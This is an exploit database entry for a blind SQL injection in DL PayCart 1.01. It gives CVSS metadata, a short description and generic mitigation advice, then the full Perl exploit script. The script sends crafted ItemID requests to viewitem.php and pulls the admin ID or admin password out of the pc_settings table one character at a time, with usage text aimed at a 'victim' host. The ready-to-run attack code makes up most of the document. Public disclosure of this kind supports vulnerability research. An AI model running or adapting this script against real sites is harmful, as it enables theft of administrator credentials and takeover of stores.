Blind SQL Injection in DL PayCart 1.01

vendor:

DL PayCart

by:

irvian

7.5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: DL PayCart

Affected Version From: DL PayCart 1.01

Affected Version To: DL PayCart 1.01

Patch Exists: NO

Related CWE:

CPE: a:dinkumsoft:dl_paycart:1.01

Metasploit:

Other Scripts:

Platforms Tested:

2007

Blind SQL Injection in DL PayCart 1.01

This exploit allows an attacker to perform blind SQL injection in DL PayCart 1.01. The vulnerability was discovered by irvian in 2007. The exploit sends malicious requests to the target website, exploiting a vulnerability in the viewitem.php file. By manipulating the 'ItemID' parameter, the attacker can extract information from the pc_settings table, specifically the 'AdminID' and 'AdminPass' fields. The exploit uses a blind technique to infer the values of these fields character by character. The exploit prints the extracted values to the console.

Mitigation:

To mitigate this vulnerability, it is recommended to apply a patch or update to a newer version of DL PayCart that addresses this issue. Additionally, input validation and sanitization should be implemented to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#!/usr/bin/perl -w
use HTTP::Request;
use LWP::UserAgent;
#---------------------------------------------------------------------------------
# scripts       : DL PayCart 1.01 - (c) 2006
# Discovered By : irvian
# scripts site  : http://www.dinkumsoft.com/
# Thanks To
# bot        : sqlscan, hantu_internet, xcart
# chanell    : #hitamputih #nyubicrew #patihack and my private channel noscan
# Friend     : nyubi, ibnusina, arioo, jipank,ifx and all my friend
#---------------------------------------------------------------------------------
if (@ARGV < 2){
die "
use      : $0 host option
example  : $0 http://victim.com 1

1= AdminID
2= AdminPass\n";}


$url = $ARGV[0];
$option = $ARGV[1];


print "\r\n[+]-----------------------------------------[+]\r\n";
print "[+]Blind SQL injection                [+]\r\n";
print "[+]DL PayCart 1.01 - (c) 2006            [+]\r\n";
print "[+]code by irvian                    [+]\r\n";
print "[+]special To : ifx, arioo, jipank        [+]\r\n";
print "[+]-----------------------------------------[+]\n\r";

if ($option eq 1){
syswrite(STDOUT, "AdminID: ", 9);}
elsif ($option eq 2){
syswrite(STDOUT, "AdminPass: ", 11);}

for($i = 1; $i <= 32; $i++){
 $f = 0;
 $n = 32;
 while(!$f && $n <= 255)
 {
  if(&blind($url, $option, $i, $n,)){
 $f = 1;
     syswrite(STDOUT, chr($n), 1);
   }
$n++;
}
}

print "\n[+]finish Execution Exploit\n";



sub blind {
my $site = $_[0];
my $op = $_[1];
my $az = $_[2];
my $na = $_[3];

if ($op eq 1){$klm = "AdminID";}
elsif ($op eq 2){$klm = "AdminPass";}

$blind = "$site"."/viewitem.php?ItemID=1'/**/and/**/substring((select/**/"."$klm"."/**/from/**/pc_settings/**/limit/**/0,1),"."$az".",1)=char("."$na".")/*";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$req = $b->request(HTTP::Request->new(GET=>$blind));
$res = $req->content;

if ($res !~ /noimage.gif/i){
    return 1;
}

}

# milw0rm.com [2007-08-28]